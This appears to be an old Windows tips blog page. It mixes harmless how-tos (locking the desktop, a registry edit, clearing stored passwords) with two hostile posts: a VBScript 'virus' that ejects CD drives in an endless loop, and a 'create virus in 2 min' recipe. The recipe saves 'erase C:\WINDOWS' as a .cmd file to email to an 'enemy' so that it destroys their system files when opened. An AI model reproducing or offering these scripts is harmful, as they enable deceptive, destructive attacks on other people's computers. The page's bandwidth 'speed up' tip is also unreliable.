JustWedding Wedding Magic Hacking Software & Game Facebook
-->

Monday, May 10, 2010

Locking the desktop

If you are leaving your computer for a while and do not wish to turn it off, but want to assure that no-one else can use the computer while you are away, locking the desktop is the best option.

By pressing WINDOWSKEY+L, you password protect your system just as if you had logged out or restarted the computer. The advantage is that any programs or processes that were running when you locked the desktop will stay open and running in the background, ready for you to resume work or play.

Removing Shared Documents folder From My Computer

Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to key

HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My Computer NameSpace DelegateFolders

You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.

Remove Stored username and Passwords !

To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords

It Works

Add your name to display clock!

go to control panel----->regional & language settings----->click on "customize" button---->click on "time" button-----> in AM symbol type your desired name---->in PM symbol type your desired name---> press ok twice-->

Sunday, May 2, 2010

A virus which opens and closes CD rom

Copy the follwing code in note pad and save it with extension .vbs

'code start from here:-

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

'code end from here

to end it go to taskmanager then
processes tab then end the wscript

create virus in 2 min

heya guys dis is d procedure if u want to erase ur enemy's windows.by sending a so called virus(actuallly a cmd)
1.go to notepad type "erase C:\WINDOWS" without qoutes and save d file as
findoutaname.cmd
2. send dis thru email to any body and wen d person opens dis file .
his windows map will be lost
warning: dont run dis file on ur system



Comments Plz

Speed Up Net Browsing!

Speed Up Your Net Browsing using the following steps--

* Open "Start"--> "Run"--> type "gpedit.msc".

* You will see "Local Computer Policy".

* Expand the "Administrative Templates" Branch.

* Expand the "Network" Branch.

* Highlight "QoS Packet Scheduler".

* Double-click "Limit Reservable Bandwidth".

* Check "Enabled".

* Change "Bandwidth limit [%]" to "0%".

* Click "Apply" and then "OK" and then "Restart".